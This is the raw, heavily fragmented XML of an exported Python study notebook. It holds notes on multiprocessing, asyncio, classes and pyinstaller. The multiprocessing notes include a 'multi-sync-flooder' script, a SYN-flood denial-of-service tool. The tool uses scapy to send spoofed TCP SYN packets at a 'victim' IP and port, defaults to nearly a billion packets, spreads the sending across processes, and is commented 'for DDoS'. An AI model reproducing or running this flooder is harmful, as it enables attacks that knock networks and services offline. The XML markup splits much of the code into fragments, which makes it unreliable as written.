      </w:r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1887583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my_cpu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multiprocessing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cpu_count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1B502D3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#print(f'my_cpu: {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my_cpu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}') # 12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE28A4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Making 1 process p1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DF27E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multiprocessing.Process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(target=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callbackName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=(tuple))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0A6A4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print(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f'Square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: {4 * 4 * 4})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9B5FA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multiprocessing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Process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target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print_cube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=(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB1AFA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print(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f'Square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: {4 * 4})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EABC08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multiprocessing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Process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target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print_square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=(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E04E8D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Start Process1 &amp; Process2 at the same time :D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D660B3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3EC9789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52247F3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Wait for p1 &amp; p2 to complete at the same time :D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D304D1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Wait for p1 to complete &amp; terminate =&gt; p1.join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2109965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join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07D84EB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Wait for p2 to complete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104F5E5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join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4FE26C5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3C625B4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To check whether p1 is still alive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2454BCA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'p1.is_alive():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is_alive</w:t>
      </w:r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1D681A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7D37B5F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To check whether p2 is still alive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4D5C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 xml:space="preserve">'p2.is_alive():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p2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is_alive</w:t>
      </w:r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BEB908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Fucking Windows needs to confirm this is the main script </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171585E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and NOT a module...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBDF0F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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>__name__</w:t>
      </w:r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CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'__main__'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24D2009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main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276E221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71E6F6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5A55C5F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example-2-sameFunc.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D5960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13EA865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10:45 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273120C9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C37CB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multiprocessing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4093323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os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="69FA76B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#input_processes = input('Please enter number of processes [500]: ')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A94BA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input_processes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10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C84B9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print_cube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1C07C3D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'os.getpid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os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getpid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0F17BA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'Cube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B21A05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print_square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541202C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'os.getpid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():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os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getpid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202456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'Square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*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C2DF6A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A5B79B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main</w:t>
      </w:r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325A668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Counting all useable CPU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511B661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my_cpu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multiprocessing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cpu_count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23274FA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'my_cpu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my_cpu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6286DD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Create a list of jobs to run in parallel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480AFB0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jobs= [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684DAD5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{'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func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':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print_cube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, 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':(3,)},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FF9C0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{'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func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':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print_square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, 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': (4,)}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17108B1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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B491B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5A47520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Changing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input_processes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to integer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D22BF1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#input_processes = int(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input_processes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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3908D7E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2350766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Number of processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DAA54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number_of_processes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input_processes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3F02A10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62E8716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List to keep track of processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A53001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processes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D37486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**** Multi-callbacks :D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE0526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Loop over the Jobs &amp; create a process for each one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C731B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for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in range(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number_of_processes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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CACE3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    p =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multiprocessing.Process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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4756B9B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    target=job['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func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'], </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651EE31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       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=job['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']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF9D14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    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DD686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36FC184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****** Single Callback for DDoS :D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003B5CB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72A1BA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47B7A0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>range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number_of_processes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0060AFE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1849C99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Creating each process p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C7EB2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multiprocessing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Process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target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print_square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,))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D942F2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Appending each p in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multiprocessing.Process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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E1D93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to List processes = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B57CC7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processes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append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24C63E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17A23B6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Start each Process p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CD18F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start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6843609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7BDD8F2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Wait for all processes to complete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC955C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Loop through each process in List processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEDB81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then wait for each process to complete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBC5F1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by joining each single process p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E98BE2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 xml:space="preserve">process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72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>processes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54C5003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.join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24A53FF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7293398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Check whether processes are still alive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15139BC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#for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, process in enumerate(processes, start=1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4B2A8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process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47B7A0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>enumerate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processes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5AAB811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'Process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is alive?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 xml:space="preserve">{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is_alive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08344F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46F97EC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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>__name__</w:t>
      </w:r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CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'__main__'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6C80E02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main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2724DB6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C024CD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F4AE46C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multi-processing-1.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4729B09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2567806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10:46 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB574BE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24C4C8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time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2420B70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time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perf_counter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161A552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do_something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0B42335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'Sleeping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for 1 second...'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5B8F0A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time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sleep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2F4A17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'Done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sleeping...'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DE31C9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2CCB7AF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989875"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>do_something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1539D1A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finish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time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perf_counter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662C4DF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'Finished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in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989875"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>round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finish</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="72A1BA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>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second(s)'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CB8620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894E00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2639607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multi-sync-flooder.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217F85C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343CDB9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10:46 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC1330F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7D07BF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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342FE74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argparse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2CC86C0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random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE43AB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from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scapy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all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="47B7A0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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989875"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>send</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="C586C0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797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979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ScapyIP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, TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11ACEB2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Testing to create many processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C5EFE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47B7A0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>multiprocessing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1190C49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os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="79D18DC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738A70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Default number of packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536C263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DEFAULT_PACK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999999999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7703A74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Total of Ports an OS can hold</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62356D0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MAX_PORTS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65535</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A50A7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DEFAULT_PORT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8082</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748EB43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DEFAULT_PROCESS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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A59FE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#Target_IP = input('Enter target IP [192.168.2.240]: ')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F3C0E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#dPort = input('Enter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dst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Port [8082]: ')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473D086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 Whole value can be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concantenated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0B7956F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#dPort = int(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dPort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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490A87B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lastRenderedPageBreak/>
        <w:t>#packets_to_send = int(DEFAULT_PACK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3404671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Get generate random IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F3DC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random_IP_addr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5167EA0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range(4) =&gt; 192.168.0.1 = 4 ranges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8A885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"." = joining 192.168.x.y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9DD52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7507786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random_IP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"."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join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map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str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random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randint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899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>255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 xml:space="preserve">_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47B7A0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>range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4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>))))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA2366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random_IP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C0E999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726ECD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get_args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0B594D7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argparse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ArgumentParser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"Sync Flooder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"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BFDF27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Allow users to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entert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-flag arguments like Traditional Linux tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584BEBC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python3 flooder.py 192.168.2.65 -a 999999999 -p 8082</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A18A8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174B8D2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python3 flooder.py --host 192.168.2.240 --port 8082 --amount 999999999 --thread 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487392B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add_argument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'-host'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'--host'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required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help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"Victim's IP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Addr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"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4CF9BF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add_argument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'-port'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'--port'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47B7A0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>int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help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"Target Port (default ports are 8080/8081/8082)"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default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4AB4EE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>DEFAULT_PORT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B9F42B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add_argument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'-amount'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'--amount'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47B7A0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>int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help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"Amount of packets (default are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infinitity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)"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default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4AB4EE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>DEFAULT_PACK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7D0886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add_argument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'-thread'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'--thread'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47B7A0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>int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help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"Number of multi-processes"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default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4AB4EE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>DEFAULT_PROCESS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60EC52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7FADE67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parser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parse_args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4D6F751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#args =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parser.parse_args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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ECCC8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6270101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return h -p -a -t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00263E8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#return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args.target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args.port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args.amount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args.process</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5639009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3D90C0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sync_flood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18B063D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1F2A7B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Instantiate all required params before looping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1517E57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target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amount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get_args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50CA56C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7D70D12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#print("Sending packets to the target...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C13FD4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As we know how many packets to send, use for loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E9B88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025A1F5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56711AD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C1F292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 xml:space="preserve">_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47B7A0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>range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amount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6279E05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#while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789FF4B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seq_n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random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randint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MAX_PORTS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B7B260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srcPort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2E6DF05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random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randint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MAX_PORTS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AAB379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Window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random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randint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MAX_PORTS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58075D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4C35BF1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Calling back random IP returned from def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random_IP_addr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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F0336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src_ip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random_IP_addr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4DF1387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A10B1C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Setting up packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D80289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sport = Source Port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A2A6F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dport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= Destination Port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EB1CD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seq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= sequence ;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seq_n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sequetial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number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BEC4F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packet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979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ScapyIP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dst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72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>target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src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src_ip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)/TCP(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sport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dport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72A1BA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flags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"S"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seq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seq_n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window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72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Window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197158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send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packet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verbose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C224FD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6B5E870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#print("Sent all packets :D")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246E462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#print(f'Sent all the packets {packet} from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src_IP:sPort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{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src_IP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}:{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sPort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} to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Target_IP:dPort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{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Target_IP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}:{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dPort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}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358565E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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A27FA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A07B00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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="989875"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r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23F933F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2A4B7DB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#input_processes = 10 # T</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D23DB4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Counting all useable CPU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539F48C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my_cpu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multiprocessing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cpu_count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20B7869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#print(f'my_cpu: {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my_cpu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}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB2D3E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Create a list of jobs to run in parallel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567718B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jobs= [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FCAE6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{'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func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':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print_cube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, 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':(3,)},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BB718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{'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func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':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print_square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, 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': (4,)}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FFD05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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE77FB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14:paraId="4E1AF2C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Number of processes from users' terminal input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE0CD2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process_input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DEFAULT_PROCESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2A491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7A43235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List to keep track of processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAEAF1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processes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multiprocessing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Process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target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sync_flood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 xml:space="preserve">_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47B7A0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>range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process_input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)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54800F4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forEach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process in processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD7BFE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 xml:space="preserve">process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72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>processes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22E922C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start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64E933A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616F0F9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Joining each process to our thread pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB6EF9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process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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="47B7A0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>enumerate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processes</w:t>
      </w:r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11129A3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join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11B2534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'Process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is alive?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 xml:space="preserve">{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is_alive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1324A0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014DAF1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**** Multi-callbacks :D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C434EC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Loop over the Jobs &amp; create a process for each one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D317DC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for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in range(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number_of_processes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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB2C17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    p =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multiprocessing.Process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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB52B7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    target=job['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func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'], </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5350DB9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       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=job['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']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60049FD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    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C741A1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7D191C1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758CD9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****** Single Callback for DDoS :D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D31AB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for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in range(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number_of_processes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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B43BD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1A696A4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# Creating each process p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591EC2D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    p =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multiprocessing.Process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(target=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do_flood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args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=())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C26846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    # Appending each p in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multiprocessing.Process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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB267B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# to List processes = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2342B55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   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processes.append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(p)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5132E7B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28EFA0D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# Start each Process p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFAE1C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   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p.start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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B5530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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71403B4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Wait for all processes to complete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482E913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Loop through each process in List processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D85F26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then wait for each process to complete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B02F5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by joining each single process p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40149D4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71E29EF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for process in processes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF9FC7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   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process.join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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A584A9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48331E8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Check whether processes are still alive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C273BC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#for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, process in enumerate(processes, start=1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382CD1C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2A7897A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for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, process in enumerate(process):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5E019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    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p.join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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04709CC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    print(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f'Process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i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is alive?\n{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p.is_alive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()}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3A854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3180DF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3CDBE13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Fucking Windows checks for whether this is the main script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5CE9A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and NOT a module...    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397D901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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>__name__</w:t>
      </w:r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CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'__main__'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210E11C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while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3CC10E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main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36B2189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6965E6B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550EB7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C665781" w14:textId="677D7870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proofErr w:type="spellStart"/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AsyncIO</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4D379B7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February 13, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69543FD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6:58 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602298A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83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 xml:space="preserve">Python Asynchronous Programming - </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/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AsyncIO</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> &amp; Async/Await</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2A477F0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E053FC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EFE675E" wp14:editId="20D055F8">
            <wp:extent cx="3378200" cy="1892300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="116" name="Pictur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9F6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FA8DB8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BFA7F9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3FEA55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B1AE03E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__</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71195CD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November 17, 2023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750CD99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10:42 AM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0905269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self = a conventional name used for 1st parameter of instance methods in a class, allowing to refer to the instance's attributes &amp; methods in the class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A63E8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5B8B7E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class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MyClass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4A74C980" w14:textId="77777777" w:rsidR="00233C26" w:rsidRDefault="00233C26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def __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init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_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_(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self, value):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D631B92" w14:textId="77777777" w:rsidR="00233C26" w:rsidRDefault="00233C26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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>self.value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= value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E25BBB4" w14:textId="77777777" w:rsidR="00233C26" w:rsidRDefault="00233C26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9ED868" w14:textId="77777777" w:rsidR="00233C26" w:rsidRDefault="00233C26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def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print_value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(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E0FCD4" w14:textId="77777777" w:rsidR="00233C26" w:rsidRDefault="00233C26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print(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self.value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42500BD6" w14:textId="77777777" w:rsidR="00233C26" w:rsidRDefault="00233C26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E2DAC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# Creating an instance of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MyClass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00EFA31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obj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MyClass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42)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045075F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DC91DB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# Calling the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print_value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method on the instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47864DF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r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>obj.print_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value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066AA3D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41C1E7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C966E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A7DF4E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D28155B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proofErr w:type="spellStart"/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pyinstaller</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="35C8380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December 18, 2023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1B051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10:54 AM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709F304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Ref:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260CD7D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85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https://docs.python.org/3/installing/index.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="55C1DD5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954A12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=== Compiler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB7338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hyperlink r:id="rId186" w:history="1">
        <w:r>
          <w:rPr>
